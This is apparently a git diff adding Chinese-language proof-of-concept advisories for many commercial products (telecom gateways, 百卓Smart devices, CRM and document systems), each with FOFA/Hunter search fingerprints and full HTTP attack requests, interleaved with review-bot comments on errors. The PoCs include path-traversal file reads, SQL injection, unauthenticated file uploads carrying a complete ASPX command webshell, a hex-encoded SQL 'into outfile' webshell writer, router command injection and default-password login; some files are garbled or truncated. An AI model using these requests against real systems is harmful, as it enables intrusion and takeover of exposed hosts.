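Review bot: in the `申瓯...index存在文件包含漏洞` hunk the 漏洞简介 paragraph (`一款全面的企业管理软件,涵盖多个领域,助力企业实现信息化管理和业务优化`) is generic ERP boilerplate that does not describe a call-recording system, and the same sentence is pasted into the next file; replace it with a one-line description of the product and name the vulnerable route (`index.php?s=index/\think\Lang/load` with the `file` parameter) in the summary instead of only in the request. The request fence is tagged `java`; it is an HTTP request.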
@@ -0,0 +1,30 @@ +# 申瓯通信设备有限公司在线录音管理系统存在任意文件下载漏洞 + +# 一、漏洞简介 +申瓯通信设备有限公司在线录音管理系统系统是一款全面的企业管理软件,涵盖多个领域,助力企业实现信息化管理和业务优化。此系统某接口存在任意文件下载漏洞。 + +# 二、影响版本 ++ 在线录音管理系统 + +# 三、资产测绘 ++ fofa`title="在线录音管理系统"` + +![1718298593944-67a12797-71e8-44ee-8755-020482502e3d.png](./img/nlilfazuEw8aisMY/1718298593944-67a12797-71e8-44ee-8755-020482502e3d-717945.png) + +# 四、漏洞复现 +```java +GET /main/download?path=/etc/passwd HTTP/1.1 +Host: +Upgrade-Insecure-Requests: 1 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 +Accept-Encoding: gzip, deflate +Accept-Language: zh-CN,zh;q=0.9 +``` + +![1718298567408-25df445c-3f5d-4b24-88db-ea01d7b8761a.png](./img/nlilfazuEw8aisMY/1718298567408-25df445c-3f5d-4b24-88db-ea01d7b8761a-936078.png) + + + +> 更新: 2024-06-17 09:34:03 +> 原文: \ No newline at end of file diff --git a/电信网关配置管理后台upload_channels.php接口存在文件上传漏洞.md b/电信网关配置管理后台upload_channels.php接口存在文件上传漏洞.md new file mode 100644 index 0000000..fe60934 --- /dev/null +++ b/电信网关配置管理后台upload_channels.php接口存在文件上传漏洞.md 
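Review bot: in the `申瓯...任意文件下载漏洞` hunk the summary says only `此系统某接口存在任意文件下载漏洞`; name the interface (`/main/download`) and the parameter (`path`) there, since anyone searching logs for this issue starts from the summary, not from the request block. The request fence is tagged `java` for an HTTP request.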
@@ -0,0 +1,31 @@ +## 电信网关配置管理后台upload_channels.php接口存在文件上传漏洞 + +电信网关配置管理系统/bak_manager/upload_channels.php 接口存在文件上传漏洞,未经身份验证的远程攻击者可以利用文件上传漏洞获取系统权限。 + +## fofa + +```javascript +body="a:link{text-decoration:none;color:orange;}" +``` + +## poc + +```jinja2 +POST /bak_manager/upload_channels.php HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15 +Content-Type: multipart/form-data;boundary=----WebKitFormBoundaryssh7UfnPpGU7BXfK +Upgrade-Insecure-Requests: 1 +Accept-Encoding: gzip + +------WebKitFormBoundaryssh7UfnPpGU7BXfK +Content-Disposition: form-data; name="file"; filename="rce.php" +Content-Type: text/plain + + +------WebKitFormBoundaryssh7UfnPpGU7BXfK-- +``` + +![image-20241108205412226](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202411082054279.png) + +文件路径:`/bak_manager/rce.php` \ No newline at end of file diff --git a/电信网关配置管理系统rewrite存在文件上传漏洞.md b/电信网关配置管理系统rewrite存在文件上传漏洞.md new file mode 100644 index 0000000..a69c5c9 --- /dev/null +++ b/电信网关配置管理系统rewrite存在文件上传漏洞.md 
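Review bot: in the `电信网关...upload_channels.php` hunk the file part for `rce.php` has an empty body (the line after `Content-Type: text/plain` is blank and the closing boundary follows), so the request as written uploads an empty file and the claimed result `/bak_manager/rce.php` cannot be reproduced or confirmed; put a harmless marker string in the part, as the TPlus PoC does with `test123`, and state what response indicates success. The fence is tagged `jinja2`; this is an HTTP request.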
@@ -0,0 +1,51 @@ +# 电信网关配置管理系统rewrite存在文件上传漏洞 + +# 一、漏洞简介 +中国电信集团有限公司(英文名称“China Telecom”、简称“中国电信”)成立于2000年9月,是中国特大型国有通信企业、上海世博会全球合作伙伴。电信网关配置管理系统del_file存在远程命令执行漏洞,攻击者可通过该漏洞获取服务器权限。 + +# 二、影响版本 ++ 电信网关配置管理系统 + +# 三、资产测绘 ++ fofa`body="img/dl.gif" && title="系统登录"` ++ 特征 + +![1713231679173-db9b0c3c-79d6-4f91-baac-a8358f5ccad1.png](./img/8c5EN0nJePhVygzM/1713231679173-db9b0c3c-79d6-4f91-baac-a8358f5ccad1-275973.png) + +# 四、漏洞复现 +```java +POST /manager/teletext/material/rewrite.php HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0 +Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryOKldnDPT +Connection: close + +------WebKitFormBoundaryOKldnDPT +Content-Disposition: form-data; name="tmp_name"; filename="test.php" +Content-Type: image/png + + +------WebKitFormBoundaryOKldnDPT +Content-Disposition: form-data; name="uploadtime" + + +------WebKitFormBoundaryOKldnDPT-- +``` + +![1715354904567-3e7260cf-b3ae-4345-bbb9-4ebc6db96872.png](./img/8c5EN0nJePhVygzM/1715354904567-3e7260cf-b3ae-4345-bbb9-4ebc6db96872-007827.png) + +上传文件地址 + +```java +GET /xmedia/material/test1.php HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0 +Connection: close +``` + +![1715354913211-9d648019-ec1d-43a8-9f31-328adcc87fcb.png](./img/8c5EN0nJePhVygzM/1715354913211-9d648019-ec1d-43a8-9f31-328adcc87fcb-610528.png) + + + +> 更新: 2024-05-14 11:21:12 +> 原文: \ No newline at end of file diff --git a/电信网关配置管理系统存在弱口令漏洞.md b/电信网关配置管理系统存在弱口令漏洞.md new file mode 100644 index 0000000..e6460f9 --- /dev/null +++ b/电信网关配置管理系统存在弱口令漏洞.md 
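Review bot: in the `电信网关配置管理系统rewrite` hunk the uploaded file is `filename="test.php"` but the verification request fetches `/xmedia/material/test1.php`, so either the filename or the path is wrong, and the doc should explain how the stored name is derived from the upload. The 漏洞简介 paragraph also describes a different bug (`电信网关配置管理系统del_file存在远程命令执行漏洞`) copied from another advisory; rewrite it for `rewrite.php`. The `uploadtime` part is sent empty with no comment on whether it is required.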
@@ -0,0 +1,37 @@ +# 电信网关配置管理系统存在弱口令漏洞 + +**一、漏洞简介** +中国电信集团有限公司(英文名称“China Telecom”、简称“中国电信”)成立于2000年9月,是中国特大型国有通信企业、上海世博会全球合作伙伴。电信网关配置管理系统del_file存在远程命令执行漏洞,攻击者可通过该漏洞获取服务器权限。 +**二、影响版本** +●电信网关配置管理系统 +**三、资产测绘** +●fofabody="src=\"img/dl.gif\"" && title="系统登录" +●特征 + +![1713231679173-db9b0c3c-79d6-4f91-baac-a8358f5ccad1.png](./img/_B2JSQE8NXjKlV47/1713231679173-db9b0c3c-79d6-4f91-baac-a8358f5ccad1-665634.webp) + + +**四、漏洞复现** + +```yaml +POST /manager/login.php HTTP/1.1 +Host: +Upgrade-Insecure-Requests: 1 +Content-Type: application/x-www-form-urlencoded +Cookie: PHPSESSID=tskslsm160gbfc5o8uskotr8i3 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 +Cache-Control: max-age=0 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36 +Accept-Encoding: gzip, deflate +Accept-Language: zh-CN,zh;q=0.9 +Content-Length: 21 + +Name=admin&Pass=admin +``` + +![1715327827741-bc58eb3d-2fa2-4e56-b04f-9bdd8dd8b59a.png](./img/_B2JSQE8NXjKlV47/1715327827741-bc58eb3d-2fa2-4e56-b04f-9bdd8dd8b59a-686922.png) + + + +> 更新: 2024-05-14 11:22:11 +> 原文: \ No newline at end of file diff --git a/电子图书阅读平台downFile.aspx存在SQL注入漏洞.md b/电子图书阅读平台downFile.aspx存在SQL注入漏洞.md new file mode 100644 index 0000000..5f945f5 --- /dev/null +++ b/电子图书阅读平台downFile.aspx存在SQL注入漏洞.md 
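Review bot: in the `电信网关配置管理系统存在弱口令漏洞` hunk the 漏洞简介 is again the `del_file存在远程命令执行漏洞` paragraph pasted from another advisory and says nothing about default credentials; state that the login at `/manager/login.php` accepts `Name=admin&Pass=admin`. The section titles are bold text (`**一、漏洞简介**`) and the bullets are `●` characters instead of the `#` headings and `+` lists the sibling files use, and the fofa line has lost its code formatting (`●fofabody="src=\"img/dl.gif\"" && title="系统登录"`), so the query runs into the word `fofa`.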
@@ -0,0 +1,23 @@ +# 电子图书阅读平台downFile.aspx存在SQL注入漏洞 + +电子图书阅读平台 downFile.aspx 接口存在SQL注入漏洞,未经身份验证的远程攻击者除了可以利用 SQL 注入漏洞获取数据库中的信息,甚至在高权限的情况可向服务器中写入木马,进一步获取服务器系统权限。 + +## fofa + +```javascript +body="/Index.aspx/SearchBy" +``` + +## poc + +```javascript +GET /web/downFile.aspx?id=%27%2B%28SELECT+CHAR%2867%29%2BCHAR%2885%29%2BCHAR%2886%29%2BCHAR%2879%29+WHERE+1651%3D1651+AND+7828+IN+%28SELECT+%28CHAR%28113%29%2BCHAR%28122%29%2BCHAR%28113%29%2BCHAR%28122%29%2BCHAR%28113%29%2B%28SELECT+%28CASE+WHEN+%287828%3D7828%29+THEN+CHAR%2849%29+ELSE+CHAR%2848%29+END%29%29%2BCHAR%28113%29%2BCHAR%28107%29%2BCHAR%28120%29%2BCHAR%28122%29%2BCHAR%28113%29%29%29%29%2B%27 HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 +Accept: */* +Accept-Encoding: gzip, deflate +Accept-Language: zh-CN,zh;q=0.9 +Connection: close +``` + +![image-20241211211738168](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202412112117238.png) \ No newline at end of file diff --git a/电子文档安全管理系统V6.0存在任意文件下载.md b/电子文档安全管理系统V6.0存在任意文件下载.md new file mode 100644 index 0000000..6c45d87 --- /dev/null +++ b/电子文档安全管理系统V6.0存在任意文件下载.md 
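Review bot: in the `电子图书阅读平台downFile.aspx` hunk the doc never says what a positive response looks like; the payload is an error-based probe that builds a marker from `CHAR()` calls, so the indicator is the string `qzqzq1qkxzq` appearing in the error page, and stating that lets the check be scripted and gives defenders a literal string to alert on. The request fence is tagged `javascript`; it is an HTTP request.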
@@ -0,0 +1,37 @@ +# 电子文档安全管理系统 V6.0存在任意文件下载 + +# 一、漏洞简介 +济南上邦电子科技有限公司电子文档安全管理系统 V6.0存在任意文件下载 + +# 二、影响版本 ++ 济南上邦电子科技有限公司电子文档安全管理系统 V6.0 + +# 三、资产测绘 ++ hunter`web.body="docsafe/docsafe.nocache.js"` ++ 特征 + +![1699199045776-f8cbf631-7614-41f1-9f78-33e297fad57f.png](./img/TTDVgI4zPNgSGRd0/1699199045776-f8cbf631-7614-41f1-9f78-33e297fad57f-841313.png) + +# 四、漏洞复现 +```plain +GET /resources/backup//..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows/win.ini HTTP/1.1 +Host: xx.xx.xx.xx +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/119.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 +Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 +Accept-Encoding: gzip, deflate +Upgrade-Insecure-Requests: 1 +Sec-Fetch-Dest: document +Sec-Fetch-Mode: navigate +Sec-Fetch-Site: none +Sec-Fetch-User: ?1 +Te: trailers +Connection: close +``` + +![1699199071902-432a9c06-5ba9-4b9e-9ded-b947c4bd6ddd.png](./img/TTDVgI4zPNgSGRd0/1699199071902-432a9c06-5ba9-4b9e-9ded-b947c4bd6ddd-986909.png) + + + +> 更新: 2024-02-29 23:55:47 +> 原文: \ No newline at end of file diff --git a/电子文档安全管理系统V6.0接口backup存在任意文件下载漏洞.md b/电子文档安全管理系统V6.0接口backup存在任意文件下载漏洞.md new file mode 100644 index 0000000..9b2a92f --- /dev/null +++ b/电子文档安全管理系统V6.0接口backup存在任意文件下载漏洞.md @@ -0,0 +1,21 @@ +# 电子文档安全管理系统V6.0接口backup存在任意文件下载漏洞 + +济南上邦电子科技有限公司电子文档安全管理系统 V6.0 resources/backup存在任意文件下载漏洞,攻击者可通过该漏洞获取服务器所有文件信息 + +## fofa + +```javascript +body="docsafe/docsafe.nocache.js" +``` + +## poc + +```javascript +GET /resources/backup//..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows/win.ini HTTP/1.1 +Host: +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 +Accept-Encoding: gzip, deflate, br, zstd +Accept-Language: zh-CN,zh;q=0.9 +Connection: keep-alive +``` + 
diff --git a/电子文档安全管理系统backup存在任意文件读取漏洞.md b/电子文档安全管理系统backup存在任意文件读取漏洞.md new file mode 100644 index 0000000..c76c233 --- /dev/null +++ b/电子文档安全管理系统backup存在任意文件读取漏洞.md @@ -0,0 +1,26 @@ +# 电子文档安全管理系统backup存在任意文件读取漏洞 + +# 一、漏洞简介 +电子文档安全管理系统backup存在任意文件读取漏洞,攻击者可通过该漏洞获取敏感信息。 + +# 二、影响版本 ++ 电子文档安全管理系统 + +# 三、资产测绘 ++ fofa`body="docsafe/docsafe.nocache.js"` ++ 特征 + +![1711559478518-0232de33-0834-4e8b-810e-5f00b48ab8c1.png](./img/ohRPmprCIfKOOSbD/1711559478518-0232de33-0834-4e8b-810e-5f00b48ab8c1-521404.png) + +# 四、漏洞复现 +```plain +GET /resources/backup/..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows/win.ini HTTP/1.1 +Host: +``` + +![1711559503009-cba29cc4-6a6b-4818-bc51-cd05c8112b1e.png](./img/ohRPmprCIfKOOSbD/1711559503009-cba29cc4-6a6b-4818-bc51-cd05c8112b1e-540735.png) + + + +> 更新: 2024-04-20 22:27:26 +> 原文: \ No newline at end of file diff --git a/电子资料管理系统ImageUpload.ashx文件上传漏洞.md b/电子资料管理系统ImageUpload.ashx文件上传漏洞.md new file mode 100644 index 0000000..7814869 --- /dev/null +++ b/电子资料管理系统ImageUpload.ashx文件上传漏洞.md 
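Review bot: the `电子文档安全管理系统backup存在任意文件读取漏洞` hunk is the third file in this commit for the same issue: `电子文档安全管理系统V6.0存在任意文件下载` and `电子文档安全管理系统V6.0接口backup存在任意文件下载漏洞` carry the same fofa fingerprint `body="docsafe/docsafe.nocache.js"` and the same `/resources/backup/..%5c...windows/win.ini` request, differing only in a doubled slash and the header set; merge the three into one file so a fix or detection note only has to be maintained once.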
@@ -0,0 +1,43 @@ +# 电子资料管理系统ImageUpload.ashx文件上传漏洞 + +电子资料管理系统 /Menu/ImageManger/ImageUpload.ashx 接口存在文件上传漏洞,未经身份验证的攻击者可通过该漏洞在服务器端任意执行代码,写入后门,获取服务器权限,进而控制整个 web 服务器。 + +## fofa + +```javascript +body="Menu/Login/ThirdLoginHandler.ashx" +``` + +## poc + +```javascript +POST /Menu/ImageManger/ImageUpload.ashx HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15 +Content-Type: multipart/form-data;boundary=----WebKitFormBoundaryssh7UfnPpGU7BXfK +Upgrade-Insecure-Requests: 1 +Accept-Encoding: gzip + +------WebKitFormBoundaryssh7UfnPpGU7BXfK +Content-Disposition: form-data; name="isUpload" + +印章图片 +------WebKitFormBoundaryssh7UfnPpGU7BXfK +Content-Disposition: form-data; name="entid" + +666 +------WebKitFormBoundaryssh7UfnPpGU7BXfK +Content-Disposition: form-data; name="Type" + +1 +------WebKitFormBoundaryssh7UfnPpGU7BXfK +Content-Disposition: form-data; name="Filedata"; filename="../rce.aspx" +Content-Type: text/plain + +<%@ Page Language="Jscript" validateRequest="false" %><%var c=new System.Diagnostics.ProcessStartInfo("cmd");var e=new System.Diagnostics.Process();var out:System.IO.StreamReader,EI:System.IO.StreamReader;c.UseShellExecute=false;c.RedirectStandardOutput=true;c.RedirectStandardError=true;e.StartInfo=c;c.Arguments="/c " + Request.Item["cmd"];e.Start();out=e.StandardOutput;EI=e.StandardError;e.Close();Response.Write(out.ReadToEnd() + EI.ReadToEnd());System.IO.File.Delete(Request.PhysicalPath);Response.End();%> +------WebKitFormBoundaryssh7UfnPpGU7BXfK-- +``` + +![image-20241128165016950](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202411281650029.png) + +文件路径:`http://127.0.0.1/rce.aspx` \ No newline at end of file diff --git a/畅捷通CRM系统newleadset.php接口存在SQL注入漏洞.md b/畅捷通CRM系统newleadset.php接口存在SQL注入漏洞.md new file mode 100644 index 0000000..859a666 --- /dev/null +++ b/畅捷通CRM系统newleadset.php接口存在SQL注入漏洞.md 
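Review bot: in the `电子资料管理系统ImageUpload.ashx` hunk the `Filedata` part ships a complete command-execution ASPX page (`Request.Item["cmd"]` passed to `cmd /c`, with self-delete); a harmless marker file is enough to prove the upload and the `filename="../rce.aspx"` traversal, and it avoids leaving an executable shell on a production host when the check is run. The stated result path `http://127.0.0.1/rce.aspx` hard-codes localhost; give a path relative to the target instead. The fence is tagged `javascript`.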
@@ -0,0 +1,22 @@ +# 畅捷通CRM系统newleadset.php接口存在SQL注入漏洞 + +用友畅捷CRM newleadset.php 处存在SQL注入漏洞 ,未经身份验证的远程攻击者除了可以利用 SQL 注入漏洞获取数据库中的信息之外,甚至在高权限的情况可向服务器中写入木马,进一步获取服务器系统权限。 + +## fofa + +```java +app="畅捷通-畅捷CRM" +``` + +## poc + +```javascript +GET /lead/newleadset.php?gblOrgID=1+AND+(SELECT+5244+FROM+(SELECT(SLEEP(5)))HAjH)--+-&DontCheckLogin=1 HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/png,image/svg+xml,*/*;q=0.8 +Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 +Accept-Encoding: gzip, deflate +``` + +![img](https://i-blog.csdnimg.cn/direct/7ad8cbe1115b4e718331016152dc26ee.png) \ No newline at end of file diff --git a/百为智能流控路由器存在命令执行漏洞.md b/百为智能流控路由器存在命令执行漏洞.md new file mode 100644 index 0000000..2f1f6fa --- /dev/null +++ b/百为智能流控路由器存在命令执行漏洞.md @@ -0,0 +1,27 @@ +# 百为智能流控路由器存在命令执行漏洞 + +# 一、漏洞简介 +百为智能流控路由器/goform/webRead/open 路由的 ?path 参数存在有回显的命令注入漏洞。攻击者可通过该漏洞在服务器端执行命令,写入后门,获取服务器权限,从而获取路由器权限。 + +# 二、影响版本 ++ 百为智能流控路由器 + +# 三、资产测绘 ++ hunter`app.name=="BYTEVALUE 百为流控 Router"` ++ 特征 + +![1700147076639-85e36dbb-4503-4fdf-858e-89f5a189d32e.png](./img/GCwyGnZtM0ZUPa42/1700147076639-85e36dbb-4503-4fdf-858e-89f5a189d32e-995996.png) + +# 四、漏洞复现 +```plain +/goform/webRead/open/?path=|ip addr +``` + +![1700147106226-ff23fa04-e5ee-4cd1-8509-e02d77fcc6f2.png](./img/GCwyGnZtM0ZUPa42/1700147106226-ff23fa04-e5ee-4cd1-8509-e02d77fcc6f2-499887.png) + +![1700147133055-a0fdb659-bf46-4dc4-88f0-3eaf2a5e9be4.png](./img/GCwyGnZtM0ZUPa42/1700147133055-a0fdb659-bf46-4dc4-88f0-3eaf2a5e9be4-956103.png) + + + +> 更新: 2024-02-29 23:57:13 +> 原文: \ No newline at end of file diff --git a/百卓SmartSQL命令注入漏洞.md b/百卓SmartSQL命令注入漏洞.md new file mode 100644 index 0000000..d2868cc --- /dev/null +++ b/百卓SmartSQL命令注入漏洞.md 
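Review bot: in the `畅捷通CRM系统newleadset.php` hunk the query string carries `DontCheckLogin=1`, which by its name is what lets the request skip the login check, yet the text never mentions it; document that parameter in the summary, since it is the single most useful token for a WAF rule or a log search on this endpoint and the thing a vendor fix has to remove. The fofa fence is tagged `java` and the request fence `javascript`.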
@@ -0,0 +1,63 @@ +# 百卓Smart SQL命令注入漏洞 + +# 一、漏洞简介 +百卓Smart是一种系列品牌上网行为管理设备,多种应用功能集于一身,包括网络应用封堵、流量控制、链路负载均衡、网页分类阻断、上网内容审计、防火墙、VPN等。该网关的管理组件文件 importhtml.php 的功能处理逻辑,对参数 sql 的传参处过滤不严,导致任意SQL语句的执行,造成任意恶意文件的写入。 + +# 二、影响版本 ++ 百卓Smart + +# 三、资产测绘 ++ fofa`app="byzoro-Smart"` ++ 特征 + +![1699974927531-d5f2d49c-f9c3-417f-abc7-7bbcaba6f53d.png](./img/UARv6UDd29RgBiDC/1699974927531-d5f2d49c-f9c3-417f-abc7-7bbcaba6f53d-383312.png) + +# 四、漏洞复现 +```plain +GET /importhtml.php?type=exporthtmlmail&tab=tb_RCtrlLog&sql=c2VsZWN0IDB4M2MzZjcwNjg3MDIwNjU2MzY4NmYyMDczNzk3Mzc0NjU2ZDI4MjQ1ZjUwNGY1MzU0NWIyMjYzNmQ2NDIyNWQyOTNiM2YzZSBpbnRvIG91dGZpbGUgJy91c3IvaGRkb2NzL25zZy9hcHAvcy5waHAn HTTP/1.1 +Host: xx.xx.xx.xx +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/119.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 +Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 +Accept-Encoding: gzip, deflate +Connection: close +Upgrade-Insecure-Requests: 1 +``` + +![1699974989232-16965ee9-3c76-45b9-b1a7-a6271b782b62.png](./img/UARv6UDd29RgBiDC/1699974989232-16965ee9-3c76-45b9-b1a7-a6271b782b62-882594.png) + +写入文件位置 + +```plain +POST /app/s.php HTTP/1.1 +Host: xx.xx.xx.xx +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36 +Accept-Encoding: gzip, deflate +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 +Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 +Connection: close +Upgrade-Insecure-Requests: 1 +Content-Type: application/x-www-form-urlencoded +Content-Length: 0 + +cmd=ifconfig +``` + +![1699975045857-a4180062-f99a-4442-a005-33f9f287cbd1.png](./img/UARv6UDd29RgBiDC/1699975045857-a4180062-f99a-4442-a005-33f9f287cbd1-056909.png) + 
+其中`c2VsZWN0IDB4M2MzZjcwNjg3MDIwNjU2MzY4NmYyMDczNzk3Mzc0NjU2ZDI4MjQ1ZjUwNGY1MzU0NWIyMjYzNmQ2NDIyNWQyOTNiM2YzZSBpbnRvIG91dGZpbGUgJy91c3IvaGRkb2NzL25zZy9hcHAvcy5waHAn`为以下代码的base64编码 + +```plain +select 0x3c3f706870206563686f2073797374656d28245f504f53545b22636d64225d293b3f3e into outfile '/usr/hddocs/nsg/app/s.php' +``` + +`0x3c3f706870206563686f2073797374656d28245f504f53545b22636d64225d293b3f3e`为webshell hex编码 + +hex解密网站`[https://www.bejson.com/convert/ox2str/](https://www.bejson.com/convert/ox2str/)` + +![1699975206003-6cf67767-eca7-44c5-bd9f-ff1a092eb766.png](./img/UARv6UDd29RgBiDC/1699975206003-6cf67767-eca7-44c5-bd9f-ff1a092eb766-896376.png) + + + +> 更新: 2024-02-29 23:57:13 +> 原文: \ No newline at end of file diff --git a/百卓Smartuploadfile存在任意文件上传漏洞.md b/百卓Smartuploadfile存在任意文件上传漏洞.md new file mode 100644 index 0000000..4ce0332 --- /dev/null +++ b/百卓Smartuploadfile存在任意文件上传漏洞.md @@ -0,0 +1,55 @@ +# 百卓Smart uploadfile存在任意文件上传漏洞 + +# 一、漏洞简介 +百卓Smart是一种系列品牌上网行为管理设备,多种应用功能集于一身,包括网络应用封堵、流量控制、链路负载均衡、网页分类阻断、上网内容审计、防火墙、VPN等。百卓Smart uploadfile存在任意文件上传漏洞,攻击者可通过该漏洞获取服务器控制权限。 + +# 二、影响版本 ++ 百卓Smart + +# 三、资产测绘 ++ fofa`app="byzoro-Smart"` ++ 特征 + +![1699974927531-d5f2d49c-f9c3-417f-abc7-7bbcaba6f53d.png](./img/5UAaScfollaesr-W/1699974927531-d5f2d49c-f9c3-417f-abc7-7bbcaba6f53d-768626.png) + +# 四、漏洞复现 +```plain +POST /Tool/uploadfile.php? HTTP/1.1 +Host: +Cookie: PHPSESSID=942c6029711a902ca974ac33efcdb383 +Content-Type: multipart/form-data; boundary=---------------------------13979701222747646634037182887 +Content-Length: 409 +Upgrade-Insecure-Requests: 1 +Sec-Fetch-Dest: document +Sec-Fetch-Mode: navigate +Sec-Fetch-Site: same-origin +Sec-Fetch-User: ?1 +Te: trailers +Connection: close + +-----------------------------13979701222747646634037182887 +Content-Disposition: form-data; name="file_upload"; filename="contents.php" +Content-Type: application/octet-stream + +Hello World

'; ?> +-----------------------------13979701222747646634037182887 +Content-Disposition: form-data; name="txt_path" + +/home/helloworld.php +-----------------------------13979701222747646634037182887-- +``` + +![1708149333069-c16f5827-752d-439f-a499-b0552a57e972.png](./img/5UAaScfollaesr-W/1708149333069-c16f5827-752d-439f-a499-b0552a57e972-291266.png) + +上传文件位置 + +```plain +/home/helloworld.php +``` + +![1708149358116-a65b5f1f-09ce-4959-bb49-51efe0944746.png](./img/5UAaScfollaesr-W/1708149358116-a65b5f1f-09ce-4959-bb49-51efe0944746-674187.png) + + + +> 更新: 2024-02-29 23:57:13 +> 原文: \ No newline at end of file diff --git a/百卓Smart后台任意文件上传漏洞.md b/百卓Smart后台任意文件上传漏洞.md new file mode 100644 index 0000000..f10d4a6 --- /dev/null +++ b/百卓Smart后台任意文件上传漏洞.md 
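Review bot: in the `百卓SmartSQL命令注入漏洞` hunk the second request (`POST /app/s.php`) declares `Content-Length: 0` but carries the body `cmd=ifconfig`; a server that honours the header reads no body, so the screenshot result cannot be reproduced; set the length to the body size (12). In the explanation below the request, the link is written as `[https://www.bejson.com/convert/ox2str/](https://www.bejson.com/convert/ox2str/)` inside backticks, so it renders as literal text instead of a link; drop the backticks. Decoding the base64 and hex layers in the text is the right level of documentation, and the decoded `into outfile '/usr/hddocs/nsg/app/s.php'` is the path a defender needs for cleanup, so keep that part.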
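Review bot: in the `百卓Smartuploadfile` hunk the body of the `contents.php` part has been mangled: it reads `Hello World`, a blank line, then `'; ?>`, so the opening `<?php echo '` was stripped somewhere along the way, the request no longer matches the declared `Content-Length: 409`, and it does not show what the uploaded file contains; restore the part (or replace it with a plain marker line, which is enough to prove the write to `/home/helloworld.php`) and recompute the length. The `txt_path` field is what sets the destination path; say so in the text, since a client-controlled destination path is the actual defect to fix.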
@@ -0,0 +1,72 @@ +# 百卓Smart后台任意文件上传漏洞 + +# 一、漏洞简介 +百卓Smart是一种系列品牌上网行为管理设备,多种应用功能集于一身,包括网络应用封堵、流量控制、链路负载均衡、网页分类阻断、上网内容审计、防火墙、VPN等。该网关后台存在任意文件上传漏洞,攻击者可通过该漏洞获取服务器控制权限。 + +# 二、影响版本 ++ 百卓Smart + +# 三、资产测绘 ++ fofa`app="byzoro-Smart"` ++ 特征 + +![1699974927531-d5f2d49c-f9c3-417f-abc7-7bbcaba6f53d.png](./img/KzgUSQ8c-_hpC3fM/1699974927531-d5f2d49c-f9c3-417f-abc7-7bbcaba6f53d-084613.png) + +# 四、漏洞复现 +1. 使用默认账号`admin/admin`登录后台,获取登录后的`cookie` + +![1699975787899-0d8a4ef8-3b73-4d82-b3fe-b8d38c7e9b52.png](./img/KzgUSQ8c-_hpC3fM/1699975787899-0d8a4ef8-3b73-4d82-b3fe-b8d38c7e9b52-981218.png) + +2. 使用上一步获取的cookie替换上传webshell + +```plain +POST /useratte/web.php? HTTP/1.1 +Host: xx.xx.xx.xx +Cookie: PHPSESSID=6fca23a63591d8742708a4c50308f150 +User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 +Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 +Accept-Encoding: gzip, deflate +Content-Type: multipart/form-data; boundary=---------------------------42328904123665875270630079328 +Content-Length: 611 +Upgrade-Insecure-Requests: 1 +Sec-Fetch-Dest: document +Sec-Fetch-Mode: navigate +Sec-Fetch-Site: same-origin +Sec-Fetch-User: ?1 +Te: trailers +Connection: close + +-----------------------------42328904123665875270630079328 +Content-Disposition: form-data; name="file_upload"; filename="2.php" +Content-Type: application/octet-stream + + +-----------------------------42328904123665875270630079328 +Content-Disposition: form-data; 